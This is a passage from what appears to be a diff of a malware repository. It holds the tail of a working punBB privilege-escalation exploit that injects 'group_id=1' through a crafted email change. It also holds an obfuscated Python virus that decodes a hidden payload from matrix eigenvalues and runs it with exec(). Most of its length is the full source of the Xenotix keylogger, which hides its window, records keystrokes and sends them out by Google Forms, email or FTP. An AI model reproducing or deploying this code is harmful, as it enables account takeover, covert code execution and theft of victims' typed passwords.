print "[-] catch all domain needed to continue"
sys.exit(-1)
# Retrive cookie
params = {
'req_username' : username,
'req_password' : password,
'form_sent' : 1
}
wclient = urllib.URLopener()
print "[+] Connecting to retrieve cookie"
req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
info = req.info()
if 'set-cookie' not in info:
print "[-] Unable to retrieve cookie... something is wrong"
sys.exit(-3)
cookie = info['set-cookie']
cookie = cookie[:string.find(cookie, ';')]
print "[+] Cookie found - extracting user_id"
user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
print "[+] User-ID: %d" % (int(user_id))
wclient.addheader('Cookie', cookie);
email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
append = 'group_id=\'1'
email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
params = {
'req_new_email' : email,
'form_sent' : 1
}
print "[+] Connecting to request change email"
req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))
print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if __name__ == "__main__":
main()
Python/Kirk_ransomware.py
+208
View File
File diff suppressed because one or more lines are too long
Python/RedKeeper-ransomware_source.py
+220
View File
File diff suppressed because one or more lines are too long
Python/Scrypt.7z
BIN
View File
Binary file not shown.
Python/Sin.7z
BIN
View File
Binary file not shown.
Python/Virus.Python.Agent.c
+98
View File
@@ -0,0 +1,98 @@
def root3(num):
fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
a=num**(1/3.0)
b=a*fak1
c=a*fak2
return([a,b,c])
def getPQ(a,b,c):
p = b-((a**2)/3.0)
q = c + ((2*(a**3)-9*a*b)/27.0)
return([p,q])
def getU(p,q):
u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
return(root3(u3))
def getLambda(a,p,u):
if u[0] == 0:
L0=u[0] - a/3.0
else:
L0=u[0] - p/(3.0*u[0]) - a/3.0
if u[1] == 0:
L1=-a/3.0
else:
L1=u[1] - p/(3.0*u[1]) - a/3.0
if u[2] == 0:
L2=-a/3.0
else:
L2=u[2] - p/(3.0*u[2]) - a/3.0
return(L0,L1,L2)
def getABC(mtx):
a=-(mtx[0]+mtx[4]+mtx[8])
b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
return([a,b,c])
def eigenvalues(mtx):
ABC=getABC(mtx)
PQ=getPQ(ABC[0],ABC[1],ABC[2])
U=getU(PQ[0],PQ[1])
L=getLambda(ABC[0],PQ[0],U)
return(L)
def getstring(M):
str=''
for c in range(len(M)):
mLD=eigenvalues(M[c])
for i in range(len(mLD)+1):
for n in range(len(mLD)):
if round(mLD[n].imag)==i:
str+=chr(int(round(mLD[n].real)))
return(str)
M=[]
M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),])
M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),])
M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),])
M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),])
M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),])
M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),])
M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),])
M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),])
M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),])
M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),])
M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),])
M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),])
M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),])
M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),])
M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),])
M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),])
M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),])
M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),])
M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),])
M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),])
M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),])
M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),])
M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),])
M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),])
M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),])
M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),])
M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),])
M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),])
M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),])
M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),])
M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),])
M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),])
M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),])
M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),])
M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),])
myMTXcode=getstring(M)
exec(myMTXcode)
Python/xenotix.py
+210
View File
@@ -0,0 +1,210 @@
'''
Xenotix Python Keylogger for Windows
====================================
Coded By: Ajin Abraham <ajin25@gmail.com>
Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
FEATURES
========
1.STORE LOGS LOCALLY
2.SEND LOGS TO GOOGLE FORMS
3.SEND LOGS TO EMAIL
4.SEND LOGS TO FTP
MINIMUM REQUIREMENTS
===================
Python 2.7: http://www.python.org/getit/
pyHook Module: http://sourceforge.net/projects/pyhook/
pyrhoncom Module: http://sourceforge.net/projects/pywin32/
pyHook Module -
Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
'''
try:
import pythoncom, pyHook
except:
print "Please Install pythoncom and pyHook modules"
exit(0)
import os
import sys
import threading
import urllib,urllib2
import smtplib
import ftplib
import datetime,time
import win32event, win32api, winerror
#Disallowing Multiple Instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "Multiple Instance not Allowed"
exit(0)
x=''
data=''
count=0
#Hide Console
def hide():
import win32console,win32gui
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window,0)
return True
def msg():
print """Xenotix Python Keylogger for Windows
Coder: Ajin Abraham <ajin25@gmail.com>
OPENSECURITY.IN
usage:xenotix_python_logger.py mode
mode:
local: store the logs in a file [keylogs.txt]
remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
"""
return True
#Local Keylogger
def local():
global data
if len(data)>100:
fp=open("keylogs.txt","a")
fp.write(data)
fp.close()
data=''
return True
#Remote Google Form logs post
def remote():
global data
if len(data)>100:
url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
try:
dataenc=urllib.urlencode(klog)
req=urllib2.Request(url,dataenc)
response=urllib2.urlopen(req)
data=''
except Exception as e:
print e
return True
#Email Logs
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>100:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com" #Specify Server Here
PORT = 587 #Specify Port Here
USER="your_email@gmail.com"#Specify Username Here
PASS="password_here"#Specify Password Here
FROM = USER#From address is taken from username
TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
SUBJECT = "Keylogger data: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
#Upload logs to FTP account
def ftp():
global data,count
if len(data)>100:
count+=1
FILENAME="logs-"+str(count)+".txt"
fp=open(FILENAME,"a")
fp.write(data)
fp.close()
data=''
try:
SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
USERNAME="ftp_username" #Specify your FTP Username
PASSWORD="ftp_password" #Specify your FTP Password
SSL=0 #Set 1 for SSL and 0 for normal connection
OUTPUT_DIR="/" #Specify output directory here
if SSL==0:
ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
elif SSL==1:
ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
ft.cwd(OUTPUT_DIR)
fp=open(FILENAME,'rb')
cmd= 'STOR' +' '+FILENAME
ft.storbinary(cmd,fp)
ft.quit()
fp.close()
os.remove(FILENAME)
except Exception as e:
print e
return True
def main():
global x
if len(sys.argv)==1:
msg()
exit(0)
else:
if sys.argv[1]=="local":
x=1
hide()
elif sys.argv[1]=="remote":
x=2
hide()
elif sys.argv[1]=="email":
hide()
email=TimerClass()
email.start()
elif sys.argv[1]=="ftp":
x=4
hide()
else:
msg()
exit(0)
return True
main()
def keypressed(event):
global x,data
if event.Ascii==13:
keys='<ENTER>'
elif event.Ascii==8:
keys='<BACK SPACE>'
elif event.Ascii==9:
keys='<TAB>'
else:
keys=chr(event.Ascii)
data=data+keys
if x==1:
local()
elif x==2:
remote()
elif x==4:
ftp()
obj = pyHook.HookManager()
obj.KeyDown = keypressed
obj.HookKeyboard()
pythoncom.PumpMessages()